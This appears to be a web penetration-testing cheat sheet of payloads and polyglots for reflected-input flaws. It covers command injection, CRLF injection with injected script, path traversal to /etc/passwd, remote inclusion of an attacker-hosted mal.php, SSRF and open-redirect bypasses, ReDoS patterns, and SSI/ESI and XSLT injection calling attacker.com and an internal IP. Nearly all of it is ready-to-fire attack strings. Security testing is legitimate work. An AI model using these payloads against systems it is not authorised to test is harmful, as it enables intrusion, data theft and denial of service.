147 lines
3.4 KiB
Markdown
147 lines
3.4 KiB
Markdown
# Reflecting Techniques - PoCs and Polygloths CheatSheet
|
|
|
|
The goal of these PoCs and Polygloths is to give the tester a fast **summary** of vulnerabilities he may exploit if his **input is somehow being reflected in the response**.
|
|
|
|
## [Client Side Template Injection](client-side-template-injection-csti.md)
|
|
|
|
### Basic Tests
|
|
|
|
```text
|
|
{{7*7}}
|
|
[7*7]
|
|
```
|
|
|
|
### Polygloths
|
|
|
|
```bash
|
|
{{7*7}}[7*7]
|
|
```
|
|
|
|
## [Command Injection](command-injection.md)
|
|
|
|
### Basic Tests
|
|
|
|
```bash
|
|
ls; id
|
|
ls||id;
|
|
ls|id;
|
|
ls&&id;
|
|
ls&id;
|
|
ls%0Aid
|
|
`ls`
|
|
$(ls)
|
|
```
|
|
|
|
### Polygloths
|
|
|
|
```bash
|
|
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
|
|
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
|
|
```
|
|
|
|
## [CRLF](crlf-0d-0a.md)
|
|
|
|
### Basic Tests
|
|
|
|
```bash
|
|
%0d%0aLocation:%20http://attacker.com
|
|
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
|
|
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
|
|
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
|
|
```
|
|
|
|
## [File Inclusion/Path Traversal](file-inclusion/)
|
|
|
|
### Basic Tests
|
|
|
|
```bash
|
|
/etc/passwd
|
|
../../../../../../etc/hosts
|
|
..\..\..\..\..\..\etc/hosts
|
|
/etc/hostname
|
|
../../../../../../etc/hosts
|
|
C:/windows/system32/drivers/etc/hosts
|
|
../../../../../../windows/system32/drivers/etc/hosts
|
|
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
|
|
http://asdasdasdasd.burpcollab.com/mal.php
|
|
\\asdasdasdasd.burpcollab.com/mal.php
|
|
```
|
|
|
|
## [File Upload](file-upload/)
|
|
|
|
{% page-ref page="file-upload/" %}
|
|
|
|
## [Open Redirect](open-redirect.md) / [Server Side Request Forgery](ssrf-server-side-request-forgery.md)
|
|
|
|
### Basic Tests
|
|
|
|
```bash
|
|
www.whitelisted.com
|
|
www.whitelisted.com.evil.com
|
|
https://google.com
|
|
//google.com
|
|
javascript:alert(1)
|
|
```
|
|
|
|
## [ReDoS](regular-expression-denial-of-service-redos.md)
|
|
|
|
### Basic Tests
|
|
|
|
```bash
|
|
(\\w*)+$
|
|
([a-zA-Z]+)*$
|
|
((a+)+)+$
|
|
```
|
|
|
|
## [Server Side Inclusion/Edge Side Inclusion](server-side-inclusion-edge-side-inclusion-injection.md)
|
|
|
|
### Basic Tests
|
|
|
|
```markup
|
|
<!--#echo var="DATE_LOCAL" -->
|
|
<!--#exec cmd="ls" -->
|
|
<esi:include src=http://attacker.com/>
|
|
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
|
```
|
|
|
|
### Polygloths
|
|
|
|
```markup
|
|
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
|
|
```
|
|
|
|
## [Server Side Template Injection](ssti-server-side-template-injection/)
|
|
|
|
### Basic Tests
|
|
|
|
```markup
|
|
${{<%[%'"}}%\
|
|
{{7*7}}
|
|
${7*7}
|
|
<%= 7*7 %>
|
|
${{7*7}}
|
|
#{7*7}
|
|
```
|
|
|
|
### Polygloths
|
|
|
|
```python
|
|
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
|
|
```
|
|
|
|
## [XSLT Server Side Injection](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)
|
|
|
|
### Basic Tests
|
|
|
|
```markup
|
|
<xsl:value-of select="system-property('xsl:version')" />
|
|
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
|
|
```
|
|
|
|
### Polygloths
|
|
|
|
```markup
|
|
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
|
|
```
|
|
|